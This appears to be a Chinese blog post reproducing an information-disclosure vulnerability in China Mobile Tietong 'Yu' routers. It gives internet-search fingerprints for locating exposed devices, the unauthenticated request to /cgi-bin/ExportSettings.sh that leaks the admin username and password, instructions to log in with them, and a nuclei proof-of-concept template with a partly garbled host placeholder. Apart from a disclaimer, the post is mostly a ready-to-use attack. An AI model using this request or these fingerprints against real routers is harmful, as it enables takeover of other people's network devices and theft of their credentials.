0day漏洞复现【禹路由器管理员账号密码泄露】

​免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述:

中移铁通禹路由器支持宽带拨号、动态IP和静态IP三种上网模式,中移禹路由器ExportSettings处存在信息泄露漏洞,通过响应包的账号密码,攻击者可以获取后台权限。

系统指纹:

fofa:title=“互联世界 物联未来-登录”

鹰图:web.body=“互联世界 物联未来-登录”

漏洞复现:

访问网站主页
在这里插入图片描述

构造pyload

http://127.0.0.1/cgi-bin/ExportSettings.sh

使用响应读取到的账号密码登录后台
在这里插入图片描述

nuclei poc

id: zhongyitietong-xinxixielou
​
info:
  name: 中移铁通禹路由器信息泄露漏洞
  author: msk
  severity: high
​
​
http:
  - raw:
      - |+
        GET /cgi-bin/ExportSettings.sh HTTP/1.1
        Host: {
    
    {
    
    Hostname}}
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
​
​
    matchers:
      - type: dsl
        dsl:
          - status_code==200

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_47289634/article/details/138658799